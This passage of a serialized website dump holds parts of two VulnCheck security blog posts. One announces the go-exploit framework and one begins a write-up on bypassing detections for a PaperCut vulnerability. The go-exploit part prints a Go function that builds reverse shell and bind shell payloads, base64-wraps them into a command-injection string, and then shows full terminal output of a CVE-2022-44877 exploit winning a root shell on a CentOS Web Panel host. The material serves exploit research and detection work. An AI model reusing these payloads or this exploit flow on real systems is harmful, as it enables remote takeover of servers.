",[886,97959,97960],{},"generatePayload"," function and then constructs the HTTP request that triggers the payload execution. Here's the implementation of ",[886,97963,97960],{},[1354,97965,97967],{"className":19022,"code":97966,"language":19024,"meta":219,"style":219},"func generatePayload(conf *config.Config) (string, bool) {\n generated := \"\"\n\n switch conf.C2Type {\n case c2.SSLShellServer:\n output.PrintfStatus(\"Sending an SSL reverse shell payload for port %s:%d\", conf.Lhost, conf.Lport)\n generated = payload.ReverseShellMknodOpenSSL(conf.Lhost, conf.Lport)\n case c2.SimpleShellServer:\n output.PrintfStatus(\"Sending a reverse shell payload for port %s:%d\", conf.Lhost, conf.Lport)\n generated = payload.ReverseShellBash(conf.Lhost, conf.Lport)\n case c2.SimpleShellClient:\n output.PrintfStatus(\"Sending a bind shell for port %d\", conf.Bport)\n generated = payload.BindShellMkfifoNetcat(conf.Bport)\n default:\n output.PrintError(\"Invalid payload\")\n\n return \"\", false\n }\n\n payload64 := b64.StdEncoding.EncodeToString([]byte(generated))\n generated = \"`echo${IFS}\" + payload64 + \"|base64${IFS}-d|\u002Fbin\u002Fsh`\"\n\n return generated, true\n}\n",[886,97968,97969,98001,98011,98015,98027,98039,98080,98112,98124,98165,98196,98208,98238,98261,98267,98285,98289,98299,98303,98307,98334,98361,98365,98376],{"__ignoreMap":219},[1373,97970,97971,97973,97975,97977,97979,97981,97983,97985,97987,97989,97991,97993,97995,97997,97999],{"class":1375,"line":1376},[1373,97972,19088],{"class":1397},[1373,97974,97572],{"class":7297},[1373,97976,1384],{"class":1383},[1373,97978,38107],{"class":19096},[1373,97980,19113],{"class":1397},[1373,97982,38112],{"class":14938},[1373,97984,59],{"class":1383},[1373,97986,38117],{"class":14938},[1373,97988,2230],{"class":1383},[1373,97990,4641],{"class":1383},[1373,97992,15752],{"class":7293},[1373,97994,5437],{"class":1383},[1373,97996,16303],{"class":7293},[1373,97998,2230],{"class":1383},[1373,98000,4765],{"class":1383},[1373,98002,98003,98006,98008],{"class":1375,"line":220},[1373,98004,98005],{"class":4640}," generated ",[1373,98007,20584],{"class":1397},[1373,98009,98010],{"class":1387}," \"\"\n",[1373,98012,98013],{"class":1375,"line":1266},[1373,98014,6520],{"emptyLinePlaceholder":237},[1373,98016,98017,98019,98021,98023,98025],{"class":1375,"line":1852},[1373,98018,38182],{"class":4636},[1373,98020,20633],{"class":4640},[1373,98022,59],{"class":1383},[1373,98024,38189],{"class":4640},[1373,98026,8904],{"class":1383},[1373,98028,98029,98031,98033,98035,98037],{"class":1375,"line":4692},[1373,98030,38196],{"class":4636},[1373,98032,38199],{"class":4640},[1373,98034,59],{"class":1383},[1373,98036,85566],{"class":4640},[1373,98038,11747],{"class":1383},[1373,98040,98041,98043,98045,98047,98049,98051,98054,98056,98058,98060,98062,98064,98066,98068,98070,98072,98074,98076,98078],{"class":1375,"line":4724},[1373,98042,97880],{"class":4640},[1373,98044,59],{"class":1383},[1373,98046,38215],{"class":7297},[1373,98048,1384],{"class":1383},[1373,98050,183],{"class":1387},[1373,98052,98053],{"class":1391},"Sending an SSL reverse shell payload for port ",[1373,98055,38048],{"class":37971},[1373,98057,4606],{"class":1391},[1373,98059,37972],{"class":37971},[1373,98061,183],{"class":1387},[1373,98063,5437],{"class":1383},[1373,98065,20633],{"class":4640},[1373,98067,59],{"class":1383},[1373,98069,38239],{"class":4640},[1373,98071,5437],{"class":1383},[1373,98073,20633],{"class":4640},[1373,98075,59],{"class":1383},[1373,98077,38248],{"class":4640},[1373,98079,11875],{"class":1383},[1373,98081,98082,98085,98087,98089,98091,98094,98096,98098,98100,98102,98104,98106,98108,98110],{"class":1375,"line":4756},[1373,98083,98084],{"class":4640}," generated ",[1373,98086,5417],{"class":1397},[1373,98088,37845],{"class":4640},[1373,98090,59],{"class":1383},[1373,98092,98093],{"class":7297},"ReverseShellMknodOpenSSL",[1373,98095,1384],{"class":1383},[1373,98097,38107],{"class":4640},[1373,98099,59],{"class":1383},[1373,98101,38239],{"class":4640},[1373,98103,5437],{"class":1383},[1373,98105,20633],{"class":4640},[1373,98107,59],{"class":1383},[1373,98109,38248],{"class":4640},[1373,98111,11875],{"class":1383},[1373,98113,98114,98116,98118,98120,98122],{"class":1375,"line":4768},[1373,98115,38196],{"class":4636},[1373,98117,38199],{"class":4640},[1373,98119,59],{"class":1383},[1373,98121,38204],{"class":4640},[1373,98123,11747],{"class":1383},[1373,98125,98126,98128,98130,98132,98134,98136,98139,98141,98143,98145,98147,98149,98151,98153,98155,98157,98159,98161,98163],{"class":1375,"line":4792},[1373,98127,97880],{"class":4640},[1373,98129,59],{"class":1383},[1373,98131,38215],{"class":7297},[1373,98133,1384],{"class":1383},[1373,98135,183],{"class":1387},[1373,98137,98138],{"class":1391},"Sending a reverse shell payload for port ",[1373,98140,38048],{"class":37971},[1373,98142,4606],{"class":1391},[1373,98144,37972],{"class":37971},[1373,98146,183],{"class":1387},[1373,98148,5437],{"class":1383},[1373,98150,20633],{"class":4640},[1373,98152,59],{"class":1383},[1373,98154,38239],{"class":4640},[1373,98156,5437],{"class":1383},[1373,98158,20633],{"class":4640},[1373,98160,59],{"class":1383},[1373,98162,38248],{"class":4640},[1373,98164,11875],{"class":1383},[1373,98166,98167,98169,98171,98173,98175,98178,98180,98182,98184,98186,98188,98190,98192,98194],{"class":1375,"line":4798},[1373,98168,98084],{"class":4640},[1373,98170,5417],{"class":1397},[1373,98172,37845],{"class":4640},[1373,98174,59],{"class":1383},[1373,98176,98177],{"class":7297},"ReverseShellBash",[1373,98179,1384],{"class":1383},[1373,98181,38107],{"class":4640},[1373,98183,59],{"class":1383},[1373,98185,38239],{"class":4640},[1373,98187,5437],{"class":1383},[1373,98189,20633],{"class":4640},[1373,98191,59],{"class":1383},[1373,98193,38248],{"class":4640},[1373,98195,11875],{"class":1383},[1373,98197,98198,98200,98202,98204,98206],{"class":1375,"line":4806},[1373,98199,38196],{"class":4636},[1373,98201,38199],{"class":4640},[1373,98203,59],{"class":1383},[1373,98205,97112],{"class":4640},[1373,98207,11747],{"class":1383},[1373,98209,98210,98212,98214,98216,98218,98220,98223,98225,98227,98229,98231,98233,98236],{"class":1375,"line":4817},[1373,98211,97880],{"class":4640},[1373,98213,59],{"class":1383},[1373,98215,38215],{"class":7297},[1373,98217,1384],{"class":1383},[1373,98219,183],{"class":1387},[1373,98221,98222],{"class":1391},"Sending a bind shell for port ",[1373,98224,37972],{"class":37971},[1373,98226,183],{"class":1387},[1373,98228,5437],{"class":1383},[1373,98230,20633],{"class":4640},[1373,98232,59],{"class":1383},[1373,98234,98235],{"class":4640},"Bport",[1373,98237,11875],{"class":1383},[1373,98239,98240,98242,98244,98246,98248,98251,98253,98255,98257,98259],{"class":1375,"line":4825},[1373,98241,98084],{"class":4640},[1373,98243,5417],{"class":1397},[1373,98245,37845],{"class":4640},[1373,98247,59],{"class":1383},[1373,98249,98250],{"class":7297},"BindShellMkfifoNetcat",[1373,98252,1384],{"class":1383},[1373,98254,38107],{"class":4640},[1373,98256,59],{"class":1383},[1373,98258,98235],{"class":4640},[1373,98260,11875],{"class":1383},[1373,98262,98263,98265],{"class":1375,"line":4835},[1373,98264,38773],{"class":4636},[1373,98266,11747],{"class":1383},[1373,98268,98269,98271,98273,98275,98277,98279,98281,98283],{"class":1375,"line":4843},[1373,98270,97880],{"class":4640},[1373,98272,59],{"class":1383},[1373,98274,20674],{"class":7297},[1373,98276,1384],{"class":1383},[1373,98278,183],{"class":1387},[1373,98280,38790],{"class":1391},[1373,98282,183],{"class":1387},[1373,98284,11875],{"class":1383},[1373,98286,98287],{"class":1375,"line":4849},[1373,98288,6520],{"emptyLinePlaceholder":237},[1373,98290,98291,98293,98295,98297],{"class":1375,"line":4877},[1373,98292,97593],{"class":4636},[1373,98294,16579],{"class":1387},[1373,98296,5437],{"class":1383},[1373,98298,16195],{"class":14985},[1373,98300,98301],{"class":1375,"line":4915},[1373,98302,4795],{"class":1383},[1373,98304,98305],{"class":1375,"line":4931},[1373,98306,6520],{"emptyLinePlaceholder":237},[1373,98308,98309,98312,98314,98316,98318,98320,98322,98324,98326,98328,98330,98332],{"class":1375,"line":4947},[1373,98310,98311],{"class":4640}," payload64 ",[1373,98313,20584],{"class":1397},[1373,98315,82963],{"class":4640},[1373,98317,59],{"class":1383},[1373,98319,82968],{"class":4640},[1373,98321,59],{"class":1383},[1373,98323,82973],{"class":7297},[1373,98325,82976],{"class":1383},[1373,98327,82979],{"class":7293},[1373,98329,1384],{"class":1383},[1373,98331,97828],{"class":4640},[1373,98333,16761],{"class":1383},[1373,98335,98336,98338,98340,98342,98345,98347,98349,98352,98354,98356,98359],{"class":1375,"line":4952},[1373,98337,98005],{"class":4640},[1373,98339,5417],{"class":1397},[1373,98341,4883],{"class":1387},[1373,98343,98344],{"class":1391},"`echo${IFS}",[1373,98346,183],{"class":1387},[1373,98348,15478],{"class":1397},[1373,98350,98351],{"class":4640}," payload64 ",[1373,98353,15448],{"class":1397},[1373,98355,4883],{"class":1387},[1373,98357,98358],{"class":1391},"|base64${IFS}-d|\u002Fbin\u002Fsh`",[1373,98360,19057],{"class":1387},[1373,98362,98363],{"class":1375,"line":6776},[1373,98364,6520],{"emptyLinePlaceholder":237},[1373,98366,98367,98369,98372,98374],{"class":1375,"line":6781},[1373,98368,7340],{"class":4636},[1373,98370,98371],{"class":4640}," generated",[1373,98373,5437],{"class":1383},[1373,98375,38077],{"class":14985},[1373,98377,98378],{"class":1375,"line":7524},[1373,98379,1855],{"class":1383},[18,98381,98382],{},"Above, we can see the implementation of the payloads for the three supported command and control variants. In this example, each variant can utilize a predefined payload provided by the exploit framework.",[18,98384,98385],{},"Finally, the exploit can be executed against the target. The output might look like this:",[1354,98387,98389],{"className":31740,"code":98388,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fgo-exploit\u002Fexamples\u002Fcve-2022-44877$ .\u002Fcve-2022-44877 -a -c -v -e -rhost 10.9.49.214 -lhost 10.9.49.186 -lport 1270\n[*] Validating the remote target is a CentOS Web Panel installation\n[+] Target validation succeeded!\n[*] Running a version check on the remote target\n[-] broken.jpg has been modified since April 3, 2022. This instance *might* be vulnerable.\n[*] The target *might* be a vulnerable version. Continuing.\n[*] Generating a TLS Certificate\n[*] Starting TLS listener on 10.9.49.186:1270\n[*] Sending an SSL reverse shell payload for port 10.9.49.186:1270\n[+] Sending exploit to https:\u002F\u002F10.9.49.214:2031\u002Flogin\u002Findex.php\n[+] Caught new shell from 10.9.49.214:35868\n[*] Active shell from 10.9.49.214:35868\n$ whoami\nsh: no job control in this shell\nsh-4.2# whoami\nroot\n$ pwd\npwd\n\u002Ftmp\n$\n",[886,98390,98391,98421,98432,98446,98475,98496,98516,98527,98538,98555,98566,98577,98588,98595,98615,98622,98627,98634,98639,98644],{"__ignoreMap":219},[1373,98392,98393,98396,98399,98401,98403,98405,98407,98409,98412,98414,98417,98419],{"class":1375,"line":1376},[1373,98394,98395],{"class":2206},"albinolobster@mournland:~\u002Fgo-exploit\u002Fexamples\u002Fcve-2022-44877$",[1373,98397,98398],{"class":1391}," .\u002Fcve-2022-44877",[1373,98400,74504],{"class":2209},[1373,98402,45587],{"class":2209},[1373,98404,45584],{"class":2209},[1373,98406,38907],{"class":2209},[1373,98408,38910],{"class":2209},[1373,98410,98411],{"class":5467}," 10.9.49.214",[1373,98413,38916],{"class":2209},[1373,98415,98416],{"class":5467}," 10.9.49.186",[1373,98418,38922],{"class":2209},[1373,98420,38925],{"class":5467},[1373,98422,98423,98425,98427,98429],{"class":1375,"line":220},[1373,98424,7035],{"class":1383},[1373,98426,35613],{"class":1397},[1373,98428,15050],{"class":1383},[1373,98430,98431],{"class":4640}," Validating the remote target is a CentOS Web Panel installation\n",[1373,98433,98434,98436,98438,98440,98443],{"class":1375,"line":1266},[1373,98435,7035],{"class":1383},[1373,98437,15448],{"class":4640},[1373,98439,15050],{"class":1383},[1373,98441,98442],{"class":4640}," Target validation succeeded",[1373,98444,98445],{"class":1397},"!\n",[1373,98447,98448,98450,98452,98454,98457,98459,98461,98464,98467,98469,98472],{"class":1375,"line":1852},[1373,98449,7035],{"class":1383},[1373,98451,35613],{"class":1397},[1373,98453,15050],{"class":1383},[1373,98455,98456],{"class":2206}," Running",[1373,98458,52105],{"class":1391},[1373,98460,45880],{"class":1391},[1373,98462,98463],{"class":1391}," check",[1373,98465,98466],{"class":1391}," on",[1373,98468,57354],{"class":1391},[1373,98470,98471],{"class":1391}," remote",[1373,98473,98474],{"class":1391}," target\n",[1373,98476,98477,98479,98481,98483,98486,98488,98491,98493],{"class":1375,"line":4692},[1373,98478,7035],{"class":1383},[1373,98480,61062],{"class":4640},[1373,98482,15050],{"class":1383},[1373,98484,98485],{"class":4640}," broken.jpg has been modified since April 3, 2022. This instance ",[1373,98487,35613],{"class":1397},[1373,98489,98490],{"class":4640},"might",[1373,98492,35613],{"class":1397},[1373,98494,98495],{"class":4640}," be vulnerable.\n",[1373,98497,98498,98500,98502,98504,98507,98509,98511,98513],{"class":1375,"line":4724},[1373,98499,7035],{"class":1383},[1373,98501,35613],{"class":1397},[1373,98503,15050],{"class":1383},[1373,98505,98506],{"class":4640}," The target ",[1373,98508,35613],{"class":1397},[1373,98510,98490],{"class":4640},[1373,98512,35613],{"class":1397},[1373,98514,98515],{"class":4640}," be a vulnerable version. Continuing.\n",[1373,98517,98518,98520,98522,98524],{"class":1375,"line":4756},[1373,98519,7035],{"class":1383},[1373,98521,35613],{"class":1397},[1373,98523,15050],{"class":1383},[1373,98525,98526],{"class":4640}," Generating a TLS Certificate\n",[1373,98528,98529,98531,98533,98535],{"class":1375,"line":4768},[1373,98530,7035],{"class":1383},[1373,98532,35613],{"class":1397},[1373,98534,15050],{"class":1383},[1373,98536,98537],{"class":4640}," Starting TLS listener on 10.9.49.186:1270\n",[1373,98539,98540,98542,98544,98546,98549,98552],{"class":1375,"line":4792},[1373,98541,7035],{"class":1383},[1373,98543,35613],{"class":1397},[1373,98545,15050],{"class":1383},[1373,98547,98548],{"class":4640}," Sending an SSL reverse shell payload ",[1373,98550,98551],{"class":4636},"for",[1373,98553,98554],{"class":4640}," port 10.9.49.186:1270\n",[1373,98556,98557,98559,98561,98563],{"class":1375,"line":4798},[1373,98558,7035],{"class":1383},[1373,98560,15448],{"class":4640},[1373,98562,15050],{"class":1383},[1373,98564,98565],{"class":4640}," Sending exploit to https:\u002F\u002F10.9.49.214:2031\u002Flogin\u002Findex.php\n",[1373,98567,98568,98570,98572,98574],{"class":1375,"line":4806},[1373,98569,7035],{"class":1383},[1373,98571,15448],{"class":4640},[1373,98573,15050],{"class":1383},[1373,98575,98576],{"class":4640}," Caught new shell from 10.9.49.214:35868\n",[1373,98578,98579,98581,98583,98585],{"class":1375,"line":4817},[1373,98580,7035],{"class":1383},[1373,98582,35613],{"class":1397},[1373,98584,15050],{"class":1383},[1373,98586,98587],{"class":4640}," Active shell from 10.9.49.214:35868\n",[1373,98589,98590,98592],{"class":1375,"line":4825},[1373,98591,4644],{"class":2206},[1373,98593,98594],{"class":1391}," whoami\n",[1373,98596,98597,98599,98602,98605,98608,98610,98612],{"class":1375,"line":4835},[1373,98598,39103],{"class":2206},[1373,98600,98601],{"class":1391}," no",[1373,98603,98604],{"class":1391}," job",[1373,98606,98607],{"class":1391}," control",[1373,98609,57301],{"class":1391},[1373,98611,69476],{"class":1391},[1373,98613,98614],{"class":1391}," shell\n",[1373,98616,98617,98620],{"class":1375,"line":4843},[1373,98618,98619],{"class":2206},"sh-4.2#",[1373,98621,98594],{"class":1391},[1373,98623,98624],{"class":1375,"line":4849},[1373,98625,98626],{"class":2206},"root\n",[1373,98628,98629,98631],{"class":1375,"line":4877},[1373,98630,4644],{"class":2206},[1373,98632,98633],{"class":1391}," pwd\n",[1373,98635,98636],{"class":1375,"line":4915},[1373,98637,98638],{"class":1379},"pwd\n",[1373,98640,98641],{"class":1375,"line":4931},[1373,98642,98643],{"class":2206},"\u002Ftmp\n",[1373,98645,98646],{"class":1375,"line":4947},[1373,98647,98648],{"class":2206},"$\n",[61,98650,1903],{"id":1902},[18,98652,98653,98655,98656,98658,98659,98661,98662,10515,98664,31181],{},[886,98654,20558],{}," provides a simple and efficient way to develop sophisticated and portable exploits. While there are several other existing exploit frameworks available, none offer the same experience as ",[886,98657,20558],{},". If you are interested in contributing to ",[886,98660,20558],{}," or have feedback on your own experience developing exploits, we would love to hear from you! Visit ",[886,98663,20558],{},[47,98665,98667],{"href":14297,"rel":98666},[51],"on GitHub",[2901,98669,98670],{},"html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sKvfc, html code.shiki .sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sP9PO, html code.shiki .sP9PO{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#E6DB74}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .s8HiA, html code.shiki .s8HiA{--shiki-light:#FF5370;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sYoWi, html code.shiki .sYoWi{--shiki-light:#E53935;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}",{"title":219,"searchDepth":220,"depth":220,"links":98672},[98673,98674,98676,98678],{"id":96741,"depth":220,"text":96742},{"id":96804,"depth":220,"text":98675},"Creating an Exploit with go-exploit",{"id":97307,"depth":220,"text":98677},"A go-exploit for CVE-2022-44877",{"id":1902,"depth":220,"text":1903},"2023-05-25","VulnCheck is excited to announce the open-source release of our in-house exploit framework, go-exploit. Designed with simplicity and portability in mind, go-exploit empowers exploit developers to create compact, self-contained, and consistent exploits.",{"slug":20558},"\u002Fblog\u002Fgo-exploit",{"title":96706,"description":98680},"blog\u002Fgo-exploit","y6UTqrJzTAaybQ6-t4njX3b_aJfYuSdxmj6mcHcjM_0",{"id":98687,"title":83462,"articles":98688,"authors":98738,"body":98740,"date":98695,"description":99859,"extension":234,"image":7,"link":7,"meta":99860,"navigation":237,"path":99862,"seo":99863,"series":7,"stem":99864,"subtype":7,"tags":99865,"__hash__":99866},"blog\u002Fblog\u002Fpapercut-rce.md",[98689,98693,98696,98699,98703,98706,98710,98713,98717,98721,98725,98728,98731,98734],{"title":98690,"source":14390,"link":98691,"date":98692},"Experts devised a new exploit for the PaperCut flaw that can bypass all current detection","https:\u002F\u002Fsecurityaffairs.com\u002F145752\u002Fhacking\u002Fpapercut-new-exploit.html","2023-05-03",{"title":98694,"source":14390,"link":98691,"date":98695},"VulnCheck researchers devised a new exploit for a recently disclosed critical flaw in PaperCut servers that bypasses all current detections.","2023-05-04",{"title":98697,"source":14382,"link":98698,"date":98695},"Researchers Uncover New Exploits for PaperCut Vulnerability That Can Bypass Detection","https:\u002F\u002Fthehackernews.com\u002F2023\u002F05\u002Fresearchers-uncover-new-exploit-for.html",{"title":98700,"source":73072,"link":98701,"date":98702},"Cyber Security Headlines: Royal ransoms Dallas, new PaperCut exploit, CISA’s Mirai warning","https:\u002F\u002Fcisoseries.com\u002Fcyber-security-headlines-royal-ransoms-dallas-new-papercut-exploit-cisas-mirai-warning\u002F","2023-05-05",{"title":98704,"source":30021,"link":98705,"date":98702},"Vulnerability in PaperCut MF and NG Allows Attackers to Bypass Security Detections","https:\u002F\u002Fwww.enterprisesecuritytech.com\u002Fpost\u002Fvulnerability-in-papercut-mf-and-ng-allows-attackers-to-bypass-security-detections",{"title":98707,"source":98708,"link":98709,"date":98702},"Cyber Security Today, May 5, 2023 – Data breach at the Metropolitan Opera, and more GoAnywhere MFT victims","ITWorld Canada","https:\u002F\u002Fwww.itworldcanada.com\u002Farticle\u002Fcyber-security-today-may-5-2023-data-breach-at-the-metropolitan-opera-and-more-goanywhere-mft-victims\u002F538259",{"title":98711,"source":3494,"link":98712,"date":98702},"Risky Biz News: Facebook takes down NodeStealer malware before it can take off the ground","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-facebook-takes-down",{"title":98714,"source":14373,"link":98715,"date":98716},"New PaperCut RCE exploit created that bypasses existing detections","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fnew-papercut-rce-exploit-created-that-bypasses-existing-detections\u002F","2023-05-06",{"title":98718,"source":14373,"link":98719,"date":98720},"Microsoft: Iranian hacking groups join Papercut attack spree","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fmicrosoft-iranian-hacking-groups-join-papercut-attack-spree\u002F","2023-05-08",{"title":98722,"source":61450,"link":98723,"date":98724},"New Way to Exploit PaperCut Vulnerability Detected","https:\u002F\u002Fwww.cysecurity.news\u002F2023\u002F05\u002Fnew-way-to-exploit-papercut.html","2023-05-09",{"title":98726,"source":39566,"link":98727,"date":98724},"State-sponsored and state-promoted cyber campaigns. Royal ransomware. A new wave of BEC. MtM attacks rising.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F89",{"title":98729,"source":39566,"link":98730,"date":98724},"PaperCut vulnerability detection methods can be bypassed, and Iranian threat actors have joined the fray.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fresearch-briefing\u002F5\u002F19",{"title":98732,"source":14382,"link":98733,"date":98724},"Microsoft Warns of State-Sponsored Attacks Exploiting Critical PaperCut Vulnerability","https:\u002F\u002Fthehackernews.com\u002F2023\u002F05\u002Fmicrosoft-warns-of-state-sponsored.html",{"title":98735,"source":11233,"link":98736,"date":98737},"Vulnerable PaperCut servers targeted by Iranian hackers","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fvulnerability-management\u002Fvulnerable-papercut-servers-targeted-by-iranian-hackers","2023-05-10",[98739],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":98741,"toc":99850},[98742,98745,98747,98760,98763,98766,98768,98772,98775,98777,98780,98793,98802,98810,98864,98867,98873,98884,98890,98896,98949,98952,98956,98959,98970,98974,98987,99002,99019,99025,99034,99038,99041,99047,99050,99054,99057,99190,99196,99206,99210,99213,99216,99222,99225,99235,99238,99252,99258,99265,99465,99470,99548,99560,99792,99818,99824,99827,99830,99836,99839,99842,99844,99847],[263,98743],{":list":98744,"ico":266,"title":83462},"[\"In mid-April attackers began exploiting a vulnerability in PaperCut NG and MF that was later assigned CVE-2023-27350.\",\"Multiple security organizations published exploit detections and indicators of compromise, including Huntress, Horizon3.ai, Proofpoint, and Microsoft.\",\"Today, VulnCheck published a proof-of-concept exploit that bypasses all published detections.\",\"This report shows that detections that focus on one code execution method, or that focus on a small subset of techniques used by one threat actor, are doomed to be useless in the next round of attacks.\",\"Since attackers learn from defenders' public detections, it's the defenders’ responsibility to produce robust detections that aren’t easily bypassed.\"]",[1920,98746,11648],{"id":11647},[18,98748,98749,98750,98754,98755,98759],{},"In mid-April, attackers began exploiting a vulnerability in ",[47,98751,70907],{"href":98752,"rel":98753},"https:\u002F\u002Fwww.papercut.com\u002F",[51]," NG and MF. The exploited vulnerability would later be assigned ",[47,98756,61693],{"href":98757,"rel":98758},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-27350",[51],". Multiple security organizations have published exploit detections and indicators of compromise that assume attackers are executing code through PaperCut’s built-in scripting interface. However, VulnCheck researchers have found a proof-of-concept exploit that bypasses all published detections from Huntress, Horizon3.ai, Emerging Threats and Microsoft.",[18,98761,98762],{},"How did this happen? PaperCut NG and MF offer multiple paths to code execution. In this blog, we detail one such path and show how an attacker can avoid existing detections based on the defender's incorrect assumptions.",[18,98764,98765],{},"Before diving into the new code execution path, let’s look at the history of this vulnerability and survey the current exploits and detections that the security community has published.",[1920,98767,11273],{"id":11272},[61,98769,98771],{"id":98770},"timeline","Timeline",[61025,98773],{":entries":98774},"[{\"date\":\"March 15, 2023\",\"markdown\":\"PaperCut Software released an [advisory](https:\u002F\u002Fweb.archive.org\u002Fweb\u002F20230315190445\u002Fhttps:\u002F\u002Fwww.papercut.com\u002Fkb\u002FMain\u002FPO-1216-and-PO-1219) for two vulnerabilities discovered by Trend Micro’s [ZDI](https:\u002F\u002Fwww.zerodayinitiative.com\u002F) program. The initial advisory contained no CVE identifiers, but instead referred to the vulnerabilities by their ZDI names: [ZDI-CAN-18987](https:\u002F\u002Fwww.zerodayinitiative.com\u002Fadvisories\u002FZDI-23-233\u002F) and [ZDI-CAN-19226](https:\u002F\u002Fwww.zerodayinitiative.com\u002Fadvisories\u002FZDI-23-232\u002F).\"},{\"date\":\"April 13, 2023\",\"markdown\":\"Attacks in the wild began around this [time](https:\u002F\u002Fnews.sophos.com\u002Fen-us\u002F2023\u002F04\u002F27\u002Fincreased-exploitation-of-papercut-drawing-blood-around-the-internet\u002F).\"},{\"date\":\"April 19, 2023\",\"markdown\":\"PaperCut Software updated their [advisory](https:\u002F\u002Fweb.archive.org\u002Fweb\u002F20230419185044\u002Fhttps:\u002F\u002Fwww.papercut.com\u002Fkb\u002FMain\u002FPO-1216-and-PO-1219) to indicate the vulnerabilities had been exploited in the wild.\"},{\"date\":\"April 20, 2023\",\"markdown\":\"CVE identifiers for the vulnerabilities were [published](https:\u002F\u002Fwww.cve.org\u002FCVERecord?id=CVE-2023-27350). The 